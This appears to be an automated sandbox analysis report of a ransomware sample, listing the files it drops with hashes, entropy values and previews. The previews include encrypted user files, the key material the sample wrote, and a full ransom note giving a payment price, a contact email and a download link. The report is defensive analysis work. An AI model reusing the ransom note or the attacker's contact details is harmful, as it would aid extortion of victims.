                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):102406
                                                                                                                                                                                                    Entropy (8bit):7.998170443018903
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:1536:06a7SMP0LnWAo8WWpciaaDzH1Q3ZjXXSCBOrHEOsb3wbVeo4vz+OrtyPjwNVd:06a5P0SVWpcZAu3BXCMuzYkVenvzNskB
                                                                                                                                                                                                    MD5:D616C6B426B2E621F53CCC3AC7843780
                                                                                                                                                                                                    SHA1:BD4D2C1E8D1D74158DC87F79C0273A9060CD1106
                                                                                                                                                                                                    SHA-256:6A3FCCA44DA8BFE05C708219D486138A88626854554F099A7838E90B3E2BA99E
                                                                                                                                                                                                    SHA-512:64EF788E5CE485A86887A78E76294D222F8D12A97CD825C2BF67B00C99F07A4C67AB116CDC585AD9E90B7FB0888E4E319E14A3A1824AE6C47DA8489FB985CE5D
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ..rI.9-.Z..g.+.,.o..^>.......j.[}..f.L....D.`.@.^.......L.w.0..d\Tp...W...is].W...vD2.m.T......M.@...{...dJ..T...6.~..C.t......<$....Fk.}..!5..."}..lj.*$.z....!...S|........o.....K@r6....>@....5..uq.n&...Q....}{.......X[...;.&...=.g...s.....U.8u.awm.....5.....@V...x.Bm.r.........C..X/RW]..E...us.{..29...uq....!.V%...}..<.1.5}....3....t..u..P."8..}.9..J..D...\....x.9.....Z`...i.^.f..h.....`1.@....B.......|aY..G5.d4......~...A.h..G........?....J\-.Ck8h.N...P..)(Ff!z.c...y.....C...bO.|_`.....pi..\..\F'._.B......h..Gcdf....K.%.....m.g........x...0..0..S.t"..T@%...WZ~.k...D.U.G.?..\.Sx'.....D3.=^<b..<>J.T.#w...Lk.a........?.....F..-.#%.h..w<.W.C.<...Y:{P.A.Qe.w..S5o.V...B$....wyg.X.M#Z...}X`N......O..].\.!o8...r.3.b..{R\.....!..,.<........=...d.)....G&..}l'..z~....f&fs.G5[..,}...J!.j...c..`..Z.........R.|,H..v....RdB...#T9.4.f[>|}.....-.....y."#......X... ..1.i.W..t...0a0..XMmp+.ec...<N_.:....H....\;.773..Xc.6.j.7..X~Ps..g....z.b3.3.....
                                                                                                                                                                                                    C:\Users\user\Local Settings\Temporary Internet Files\Content.IE5\WJ8I2OL4\ellipsis_white_5ac590ee72bfe06a7cecfd75b588ad73[1].svg.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1244
                                                                                                                                                                                                    Entropy (8bit):7.83201526550732
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:+/2PWb8zXBHiMzIh+9ycxmlRw4wqjblkkveX+SvjbD:+/EzR/8Y9jx5EjSz+43D
                                                                                                                                                                                                    MD5:7D586C776686AEA6CAB0E6474A6C164E
                                                                                                                                                                                                    SHA1:5D89FF4E229558EB229B6C9550CA401A0838141D
                                                                                                                                                                                                    SHA-256:4D13FD378278B6484B9408CAD576535B346005FDF94402592D9A07122B919116
                                                                                                                                                                                                    SHA-512:AE80004CADA0934043288999C816CCF6C96B697C9D6C50FCA1D9D0391DA609FF509A807077C19FCAC2068AFA5DC7A295523C2C8FCE3F4322A5EE3764B7326E93
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: _.v.}....l^.`e..]..Z..%..n.qv.*.^.KogA.6.Fw.........._.+$[5.b.6@..s..#.nl.1..A.....>.6.......E......<9;....S..%...}a........J..6......ef.$V..On5..x...y\...e6......>.!W...i..........@..T..'._s%6.C....+.{E..o.P^{...7m.g..~9%.X.!c..l.yZ...X........E5.@eD.&^T&.V...1j..k...D~......0..C.p.8.X..&.Y.. BN&......{j...u.^..UW|...%..Mz.U."..[^..K!~28......2`2.:......0j....+...i........j...Vq.[.&N8.4..O.o;LI1..u<1UO.[F,..]8...BU.Z..o....2....Z........tv...+.......-.|...E)...~.8./.fQP2.pE.?.3...+I....VN=2....}..G.LG. .qmp..aB1....a.........4.9....."..vK...-..?...1..q...=...e...h4].^.h.m..+...M.^zJ.#....O....`."6.w......<e.wX...Toe.....M.;..,b...o.[.P.j..hU...$b..}........!.v.(...~..t..^....R.Hy].Y..h....V.......<.]q..*..C.L.."..T.....~8.x.XyI...%V..n..Hn...|.E....UP....N.8....!=..bi4.I.....,Ba.z-z...".....[fJE .......R2>. ..y..U..Z..[.x..H..s.P.../..t...+NS.........o.7X..V.....sB..8o..R..'J)..(...I)......^nAi..U[.V/...[:5.q......u......nvr..W..
                                                                                                                                                                                                    C:\Users\user\Local Settings\Temporary Internet Files\Content.IE5\WJ8I2OL4\favicon[1].ico.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):17503
                                                                                                                                                                                                    Entropy (8bit):7.988918139497784
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:384:7QTfslCzrUesO44EdhQb28A4sgOewoaKphSiHWt0PU:ik0zYHrcIGwIWiE0PU
                                                                                                                                                                                                    MD5:5DB9EB77AEE3175D9557213F4713BA85
                                                                                                                                                                                                    SHA1:D3E75F677B505872235F8F3FAEA162D99FA9B2FD
                                                                                                                                                                                                    SHA-256:6AADD27D7BE445AAD6AAF2B41706BEE35E3FE5A8ACF32D1A6BFCEA6CB1FA5950
                                                                                                                                                                                                    SHA-512:15E973C917183FDF76202E8D436552228FEBF7ADDCCE529591CCBEA328F58472146D751376A876AA9937433AC6A8125EB562BAA211DF42AF2E7ADB0F9EFFD4B2
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: QS..."^.....J......6._*..H<kXJ....[Y.....,....u,.....r....9O]K\..../>.......`....M[.?..6e..U..\...T.;A.2z....L.1/k~d;.2.p..v.Su2....).I.uj..y......8.A..C.*..;...o......i.l...'..fw.2Rq.O.....b6......l....W{#F.!..;..q(......~j.....d..x!1?.F.B.ba);..PW...PX;.....X......u..../.@{.......wY._.....#....^..HP...P.yg...1..v..d62f.+..Pv.g|."...p$.2......U..uw#.%..`0.XA.....[`.b...........s...q...:)....%..i.r.6:.Iw..+.<F;..\....C.. ....8.l....\.t5...o..O..s...L..I*.=.$U..k.._.QWU.v.i......0......Ja....O.bD........yL.V... ...gH.....jaVf....w....O.'ag.....?~Y`.....3X.C..Nf..9........9m.G.s...).....`E....>{......(C....^..3.l..3..)..d..V.B..&*..C..I.`........MT.Hr.%..N_A....$..Y.......).{.j....Z.>..w..f.E .:..d...2.3......f..*....r.J.$..-uW...X...t........$eW..OU...v..7......&j.....Q..7BL..Y|.t.u>0^.~."....fF...g:...9^..)..]Bx...<*,.4.....}.CR.0...GA..n!l~?V&{t...ia.........,(/Jb.qL....2.P.]...b.s...O.JG...>..6x...a.1....?..0.......=(.s../..{...%.
                                                                                                                                                                                                    C:\Users\user\Local Settings\Temporary Internet Files\Content.IE5\WJ8I2OL4\iecompatviewlist[1].xml.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):153934
                                                                                                                                                                                                    Entropy (8bit):7.998891387376525
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:3072:P9ug6drIYaT+VH4OVdSl6HUCAxnfQRhDJu9OJETEwhqpeveDhTRQ25AIGMW:0dMYaTGdffAxnQkgvwgev+TR/5ADMW
                                                                                                                                                                                                    MD5:4912BE144FBF31C76CC8FF0EE2B92AA4
                                                                                                                                                                                                    SHA1:392B0523C23FE3A3E19E6244A589B6903C896B75
                                                                                                                                                                                                    SHA-256:3DFC7D874EF70BB8E6829D288235274AED91A5BCC29BB26BA56C5A497D40C9ED
                                                                                                                                                                                                    SHA-512:5BDD714A1996E7DF9DE81CD70C1E8F503BD6A3A7F823C185C0E7718031CA166B90224E94749DF9462DF4EBB639FAB91291021FAFD58C548C302C8F5D11C55C4A
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: @Cw..V.W..H!...A.W..Y~.Bo...x..+...5..3L../4..2....^....Wq...5"]~s.....+...T............fx..wV.S.k.6...t....R$....I-Bx._<.+..)...+..-.=..6#{.v..8.ry.&..3..D..NLq.........pk0....r}.......rS..4..i.v.... .,..../...2.5^cy...*6.`..!.......bV...b....J^P..ZT.);H.X....s...D..F....*.+D..\.....2..g..\.Q:......^...p .XT.Q.....).T..N........f..M.k$>....H..]vmL..........7..Q{.&R.T._9....r......,.3=s..B.#o5..O7t.^.I..ug>..B...B:..*.;.u.......S.W....f..i|.@y.#Y2.-".l[...r_%\...P...9.N5f\Y@t.....T..).VFh.i..#.......q44....k.....aI.&y{R.+......M.??.+...O....%.v..'.w..}x...._#[}...h.b...<.....4..L.x.`..Q...M....c.5jR.Ie.N...._!..ga.A.1h...|.j>.K...r............H..o....X..FL....X.R.o.?."O....l"=.Y..2..5^.g.i..p..p..@d.v..1h...V'N.]...g.._Fo7.....A...v)%.g.G.....j(Y-&..h*%.x...Eq..y.>\#p3.......ji.p.2.......cd.... ...>...0.2..SC`P"{EE{.`\....[4.8.V?..H..7.Y..:V..9]?...X..-........A1`i....m.oU..Lr.h..C...a*v..C|..V..{W..2}...FR....`,~..
                                                                                                                                                                                                    C:\Users\user\Local Settings\Temporary Internet Files\Low\MSIMGSIZ.DAT.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):49449
                                                                                                                                                                                                    Entropy (8bit):7.996223556431898
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:768:5K+PkckeejprfnK4dy5zAjrArEriq6d3sfbXl0dP7XxGFZy/wblWAhiIyj/7qwSy:5KmqeeVrfnIAXTR6Y10RlGdsAjyj/9MS
                                                                                                                                                                                                    MD5:4121ACDF030008BC0FF78A98C71786FC
                                                                                                                                                                                                    SHA1:FB379605BE6DEC84579BB92B4AB507C447C9BA14
                                                                                                                                                                                                    SHA-256:9B09BD97C4A324B6B64AF8B82FB1387825992900F9D1544F9DAB03D9E7AE7609
                                                                                                                                                                                                    SHA-512:4410FD89B92B5B9D1C955FA7E263A2FAC75163446BA43AEB2D48E2FA599DB287A13B27CFB6C2A1AFC2C4C0570B0BC6905B6D6582BB2A692820D224A929E972F3
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: NR=.....,...%Ce.v..AG'?..}....`%Pr.....l.wdIV|......r..dW.......Z..W.U9$.....f..@.#u...w.1...r.y%.dU.....r.S.........z.u..gZ'.E.,..p(V2.]B .........~..e3....I.n#8.<v..d.gD8Jp.>q......Z.h...{.f..2......?N.......[...8.l....?..^|3#..+d......v.0.H......O&....8i8.:V..5....&.,.....%&/...k.H..w}.P..[......HD+lN......U.xh.J..&.Y..Q....._....0}..0..w.N..O.m.yAF..g.k.)..w..':h|.q$5.;RZ.wJ.X.@j.V...i.-.yLQ......4..Y..S..z..........%E...RT.....v.mSYn.........b_K.BM_P.{..*...B..T\..0..Z.3..#.08.(T...2...T7.....>.[.4....d.2KDD.(..s!....e]2y.?.T.......L.5Iw.^.....mP.i.5............+n:u.....<qX.~..T...Ak....5;.vY%.|...ZZ.)h...XG..M.@.T..v..+s.$._`.!(....|.5.J..(e.....KmJ...0.a...-~p.~.&4j...:............p..7....1.+i..w.?oV^...W.NJ._.o..B..._wc.PO...bV........6....,2..z...5W..u...J|..}..h4....&...`.......y(.'..~..A.|w...........8....s.$0_|....o.N~8.....#C.6.*..+j.5.<.@.....(..N..r...G...&...^.p.....dC...m.;.`...H[.|A{......Vc.e*}..o......GC....h.%]=2{..g#..d+T...
                                                                                                                                                                                                    C:\Users\user\Local Settings\Temporary Internet Files\Low\SmartScreenCache.dat.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):123345
                                                                                                                                                                                                    Entropy (8bit):7.9984479785697395
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:3072:smXAFbJ7NdCsN+DFEybevmXJPzVBKrHIkH0U37a:sJN38BeuJLGHIkU7
                                                                                                                                                                                                    MD5:C44177C4082037B0D79BB7162633EB23
                                                                                                                                                                                                    SHA1:58BC3DF955D7E81E361F3620E0AA6192C9373F87
                                                                                                                                                                                                    SHA-256:F3B3E9F8DC72D534267110E8293B049634EAF599A1D91D132AEA947C75CB9857
                                                                                                                                                                                                    SHA-512:32A1EBA62589B06FE45D33362203873A5FFE69F74EAFAEC3D8999B85F75200590C30F7B5A776042D07FD7DB76FFAF2C1E7BA6C2A7B5BC2A0F55A55FE0C67C917
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ...{.....z.~^=..O].L.=..hW..J.....-V..j......+.u..Of.&|.t..J.]JM....n......?....Lm....(.....;.......D.^.W..-...W.HG...@<......%..T7.w.i...`t...{.o.`y7.4.... ..N).Tw. ..r..).....k./...hn._H..%.7.0 W=.4v...~.....O.X.\8S.0................W....!U..._..+].Q~....u..8p....M...m..C..j`>..l.....X..".(..utxY..3Vt....G...".. .X.U...m..4.y..)t"[|].!10..+.(.....]s.O..m..R./._=T]%....gAxl...E..l;.....z..a!A..1....3.N$..g....Re..vs...-?.<..N...)...[.A.....G.j~.....z.%j......}k...Q...Ij.[].cW.Yu.3-.....y...1..VvG.n&....&.uu.c.....s.Y.u...=..c..[.. .....q...D.2......Z.".L^......Mc2..8..YTdQlv.............5....^.;)j..Ax.V....LOa......Y...6a.Sn...<)]..u...U....fX...H.BG.wf9D.\vR|.....5..;=2p.....(......f4..pV.%`?..8..f.hq....j(.M..'^..#.....<[\i........E..=...%cZ$..p).....[..D.pgp?.[g.6G.9/~.W.z..kc.~..Z,X...J.....#.q-...g<.7.Nj.J..2..xQ.X.I.............Cz|c.5&m..vg.I...K7b...("#W..z.o.1$..&a,...j.Q..Gi.2...C. m....$>.2..B-3.,]..tY.J...x.......@Y...=.T
                                                                                                                                                                                                    C:\Users\user\Local Settings\b6f888d4-cc05-4e6a-87b2-00fd6ab00749\Ln0LqSBLhS.exe.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):153934
                                                                                                                                                                                                    Entropy (8bit):7.998807991928179
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:3072:GCt37Vw7dcSQdGgHxArzTzFfl8ams0F6rwPAwxYIK0BDx3HqMxLev:GqLVGcwrHhl8amsm3YwxYIXHhk
                                                                                                                                                                                                    MD5:370B1D3C81CEA17145616EC75EF16756
                                                                                                                                                                                                    SHA1:E28D22FC4B90A8FA4C158BB9F7AF063A7B4EE30F
                                                                                                                                                                                                    SHA-256:2A0CDD8B1D8EA349AEA4042BEDEF727C05072AEF99E3DA450EF6636B4BD4CF65
                                                                                                                                                                                                    SHA-512:67155613BEA25E5E41FD4F05CF9BBBC8DE667101E51B9A7134DB748FF8AA7FB2D90F5435E23E761B5DC989F0FF587B38BAC0870F555BFEFB14713A749EE1452F
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ...-._..0..2.wj...Gs.x...u.^..R...7r.f..."......O.1#......4.....>.E;;..........-..H.g.J.Y..i....T......p.'....tW.O..!.'..}....O.bVG.|...-...A.Bh......9.. ...D.b;.........f..W...G.U"..p/.(.+..H.9+.%.p..5...5.}..j..^....h..C(.[....FTO.C.?..'.#\[.........:...W....q,oTl.............5......0Rx.s.\`a.,.GJ...F6....h.r.c.$...o.7.W..p(H.......#..U...f..b.D....<.u...3n....}.....2x..IQ...$Y..._..d..i...zod..g.._-.F...Y3Pt..J....S.nJ...YB)Y3.BtC[...F7.....+N...?...e..8..Zi.;#(.cc..Vz..yc....b..Q .+.sjv].-.~.U...\n....?yz..p.1.....<B~[..ry..+.W..q..0v....Q.T5_..q"...n.wH.+.F....ym.......`.Of/~..+...g....r..=......CG.P.HE......h.B..m>3E...#z..Q..2..J.q..F.y.mk....W.....Ks..P./Y...$1I...C3.....,..;.........i.MZ.....'.|4..vba._.k7.7.[.o#q.ei...p...9?...}. ui+}YG........}F....2..W.......)...|1M8.L..C)`.1....;...4p..v]..[....O.}.G.^..`...r..ME.U.....E......$.S..q..*Z.........4m.%.T.m....q.*/..V..D.i.mb8.E*.g0.|f..dn..N.l..q......`(r.TA.P3.~.|.%.a.W.
                                                                                                                                                                                                    C:\Users\user\Local Settings\bowsakkdestx.txt.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1451
                                                                                                                                                                                                    Entropy (8bit):7.51541572091002
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:YgJc4QTXF6zwwOmLF6TMKkr+IUdBnACW/HfyzcSrYBTF4PXKXOnHMMvLAubD:YgCVTawwOmLg7ciBnsyvYBTFICMjAMD
                                                                                                                                                                                                    MD5:CA23CF2658A4DFCA140F9CE3E41A14FB
                                                                                                                                                                                                    SHA1:2727030BC53BA217BBC6F27D060F1A221DF9078A
                                                                                                                                                                                                    SHA-256:3B97C8985714F1506CB707B8962325B8846FA90872CF239934FAEFAFC3055A2B
                                                                                                                                                                                                    SHA-512:ECA00BD7505A6F05FA2E2A00CE31A1CCDA18A8B43239891D1A725F5D9AF9F27605646BCE2E05EF5B884CE7DCA4D311A055E7E6B54D6A53A1F3D9FC82C40077C2
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: {"public_key":"-----BEGIN&#160;PUBLIC&#160;KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2ConnkmHf3F5UYxtsjHW\\nSiM2IvLtvv4J1\/ft1bhz0esbAqY+vEkCsZk01XKhCmgnDWI7UbJRHpe1O6z4AUmI\\nDnZleNmpbjcnpQQf\/AJsji8cGQBN7M9Emo2bQA5c6hXkvjtWR4M4vl7BjYJ9jtLB\\nVPHbk2ycWgGrzLt1oJjcg6wqDaloxbSgYPTlTKJf7XV8mmHVd9\/Z\/Jxp7QvuLbw2\\nNoyha2bP9UrfGnQFruqKfv0VD33O++D\/k\/+XXqhTOuI7V8D353lJ\/wVjQ9GMlS8d\\nlr9BP5EjT5G5sfmFRugSg2vIx2Afdmq6CSWzGDea6amEaGDJBeENnw8fdGcnzPKP\\ntwIDAQAB\\n-----END&#160;PUBLIC&#160;KEY-----\\n","id":"5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB"}.M..4.^.)..s....FB.\..3..T..q..9.(.......K].....j.....$..ch[.t.0.<x.M0.A...e.uw}B... .Ui..2..kke......GB..J....C..m...3D.....:c.|.b... _.?...M.s..z.5.bF:H...>....;..;#^.J~...!.%......r.}.b~6.}.?....P<......u...Y.....e %.....s}P).u......Yk..T..U...;.....q..Ot.oN..h.e..s.f....-{R.N..Y...,.*.@..0..!2.I+....x.A.."...})..7<[\..~..Vxp..n.QWZ....G7n.L..4..j.W&.T.-....q.x@..`...ck1@..[Kq.[...L..2..N..s.r..{{.8.$x.u.._L..B
                                                                                                                                                                                                    C:\Users\user\SendTo\Bluetooth File Transfer.LNK.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1378
                                                                                                                                                                                                    Entropy (8bit):7.84461934416209
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:4OpRqJFlUh2N1Hv/MoNrZN4GHPeh8IbkI2JC7TbD:PpMJFlUwHvxBZGX8xUD
                                                                                                                                                                                                    MD5:C4681AA52E129DB902049FE748EDF152
                                                                                                                                                                                                    SHA1:37EA800BC0EAD2F8D48575BC0676323E146DC638
                                                                                                                                                                                                    SHA-256:BA24DE4F548FFCBF3CADD7193D42EC7AB876BC0801455ABDC3968CA6BE94C6E7
                                                                                                                                                                                                    SHA-512:5B3A2BB8BB6055ECEDB221C66D7612F62F0AF417F05A4B07CF6A35A5699EBCED8980534D8C7A45624D78A0E6F913DC9FE36EAF8E04FE4DD6DBBBE106005723B5
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ...",Mx....H..V.......CI..l..9.A,.Xy.Q.F,.....'.....&.......$...rlSJ:.T..D..MS.......|m..5'.u....x...s...e.u#.&*..p......\.(u...`....N......yR.....%v.r..m~_.e.....yal.....O.8...+.]A...?.D...!...>.mt9..6...;.;.....u....&.........]..xn....4..*?.].&..@......4...6*..$...i-......W....n..e.9N.m..t...%...me....(.N...fD`.p....]..p.H..N.D..pk..iC...x......*..}....~.....R.,..hS.....;.bH .NQ -..B.Z...L.|X.IiE..-..lJF....~.r.......EmhS'.k^<...f9..3..=O...r6....j,.#u..Z....p..e.emnL;L.....K.r....0....p.*...H.\.5~7h:$&.>z..xjB.l...IL.L$$m.?....%...M..$...$..?I)$.KR[..p....S.Cd...V.....=#`..1.-...7Q*..0%..?.b....\...q..#...U...9P.).....h^..Z....|.L\e.B&v.0.4"......._.V....bd...\._.e.........&.|...(....lG.v.Z.@v..\B..df;G.......x...?{...%w.V. .D........A.i].3X..X^z..U...j.fcX.....%P|>2.Q.....6/.....P.......Y^.j..ei(A.G._.o.-F*..%.m..I<.tj.w...\..9O...u.BK.....&G.......}B.....6=tH...M....''2R..B.>..A...@...q.s.{..F.W.f]...y..4...i[..<...d1+
                                                                                                                                                                                                    C:\Users\user\SendTo\Desktop (create shortcut).DeskLink.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):336
                                                                                                                                                                                                    Entropy (8bit):7.14625817883756
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:6:WSKSU5PkBfBL6lSEqsvMtMbBgCmI9wzzJf3N+W3VN601D3+3i75dExcii96Z:/HU5ufBOFF9aewfh3Nn3VN60ZGXcii9a
                                                                                                                                                                                                    MD5:93752DA882D34119E3B1279D82A1812C
                                                                                                                                                                                                    SHA1:61CFF282F2AB4011625D5072DCDD9122BD9EC29A
                                                                                                                                                                                                    SHA-256:AF95D9B9A8067110B8455BF3A701DBE6621114A8B08590EA42C9CE9C4FB87270
                                                                                                                                                                                                    SHA-512:0328D552841C6E10B66129399B68D5EF0FF0CBBB759D9F10537B7C95D66BF6DEF92516FA834896B25BBC9B655ABA0D9666660D6460069DA28C4F2E9F138B30A3
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: @4C...}......Jf..h....z....4..*.?S05A~!.m......V.l%..;.I.....C_@.+.}cO.1)...az..ah6...t.....t.c........`.O...S.i..Y.).l.Wg.&UD.q...IB..E...E.p...fmB./.$tS!cn....pm..J..;u!U...kd..@......i..{3. .z...?tu....d..rW.!..m.......eP..F...a~R*`h.n.C*M].5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\_readme.txt
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1110
                                                                                                                                                                                                    Entropy (8bit):4.9021366553935914
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:FS5ZHPnIekFQjhRe9bgnYLuWsetmFRqrl3W4kA+GT/kF5M2/k/rAyBJPLi:WZHfv0p6WsetPFWrDGT0f/k/19i
                                                                                                                                                                                                    MD5:B6755957A117FC8FEDC20B289E124B44
                                                                                                                                                                                                    SHA1:A2C366F3E811EC6A56BE212A9D1F07A0BC936FC9
                                                                                                                                                                                                    SHA-256:41C93614A97E8234307754A627DB9FCA606FED2E79DB34154C461BAED3C9A62C
                                                                                                                                                                                                    SHA-512:8C4FDE9C7CAC4123A08D4B2BC736E0BC11F9985F2231DECF56A97D8814F75EA140E71D465F65FDD6EA13888ABA9245738678BF20867A1F18427B918F3889AEE8
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ATTENTION!....Don't worry, you can return all your files!..All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key...The only method of recovering files is to purchase decrypt tool and unique key for you...This software will decrypt all your encrypted files...What guarantees you have?..You can send one of your encrypted file from your PC and we decrypt it for free...But we can decrypt only 1 file for free. File must not contain valuable information...You can get and look video overview decrypt tool:..https://we.tl/t-VCW326HODa..Price of private key and decrypt software is $980...Discount 50% available if you contact us first 72 hours, that's price for you is $490...Please note that you'll never restore your data without payment...Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours.......To get this software you need write on our e-mail:..manager@mailtemp.ch....Reserve e-mail address to
                                                                                                                                                                                                    C:\_readme.txt
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1110
                                                                                                                                                                                                    Entropy (8bit):4.9021366553935914
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:FS5ZHPnIekFQjhRe9bgnYLuWsetmFRqrl3W4kA+GT/kF5M2/k/rAyBJPLi:WZHfv0p6WsetPFWrDGT0f/k/19i
                                                                                                                                                                                                    MD5:B6755957A117FC8FEDC20B289E124B44
                                                                                                                                                                                                    SHA1:A2C366F3E811EC6A56BE212A9D1F07A0BC936FC9
                                                                                                                                                                                                    SHA-256:41C93614A97E8234307754A627DB9FCA606FED2E79DB34154C461BAED3C9A62C
                                                                                                                                                                                                    SHA-512:8C4FDE9C7CAC4123A08D4B2BC736E0BC11F9985F2231DECF56A97D8814F75EA140E71D465F65FDD6EA13888ABA9245738678BF20867A1F18427B918F3889AEE8
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ATTENTION!....Don't worry, you can return all your files!..All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key...The only method of recovering files is to purchase decrypt tool and unique key for you...This software will decrypt all your encrypted files...What guarantees you have?..You can send one of your encrypted file from your PC and we decrypt it for free...But we can decrypt only 1 file for free. File must not contain valuable information...You can get and look video overview decrypt tool:..https://we.tl/t-VCW326HODa..Price of private key and decrypt software is $980...Discount 50% available if you contact us first 72 hours, that's price for you is $490...Please note that you'll never restore your data without payment...Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours.......To get this software you need write on our e-mail:..manager@mailtemp.ch....Reserve e-mail address to
                                                                                                                                                                                                    C:\bootTel.dat
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):409
                                                                                                                                                                                                    Entropy (8bit):7.323938689727618
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:6:aw1DqjmCOCbdDfi8lWysVgOAeioMHFvc8uZPCkDgxo7iacd9ZbUCai75dExcii9a:VjCOCJDf2oewW6ogxo+Xd9ZQLXcii9a
                                                                                                                                                                                                    MD5:343A0703E2240362D39BB2CDF88759FB
                                                                                                                                                                                                    SHA1:73BF6168E04AB82274D473938B242453A9DE1953
                                                                                                                                                                                                    SHA-256:41F9133FA189CB091983638DF99F044A87F9E1214257E1C353454764729A504A
                                                                                                                                                                                                    SHA-512:CBCC0C249C2DAD087D28D299EF0B5253344B0D873CF26DBC8954CC883BAEBACEA6F82F860762287F782FF202EFD9A93D7C5E3426EEDB721EAF2B67824068EE82
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
